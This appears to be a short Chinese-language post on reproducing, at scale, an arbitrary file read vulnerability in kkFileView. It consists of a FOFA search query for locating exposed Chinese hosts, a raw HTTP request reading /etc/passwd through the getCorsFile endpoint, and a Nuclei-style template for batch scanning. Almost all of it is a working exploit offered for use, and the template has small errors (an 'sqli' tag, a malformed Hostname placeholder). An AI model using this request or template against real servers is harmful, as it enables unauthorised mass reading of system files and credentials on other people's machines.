kkfileview任意文件读取漏洞复现（批量化）

"fileview" && is_domain=true && country="CN"

GET /getCorsFile?urlPath=file:///etc/passwd HTTP/1.1
Host: XXXXX.com
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

id: kkfileviewreadfile
info:
  name: kkfileview任意文件读取
  author: someone
  severity: critical
  description: kkfileview任意文件读取，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。
  reference:
  metadata:
    verified: true
    max-request: 1
    fofa-query: FOFA:app="kkfileview"
  tags: sqli

requests:
  - raw:
      - |
        GET /getCorsFile?urlPath=file:///etc/passwd HTTP/2
        Host: {{Hostname)}}
        Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root'
        condition: and

      - type: status
        status:
          - 200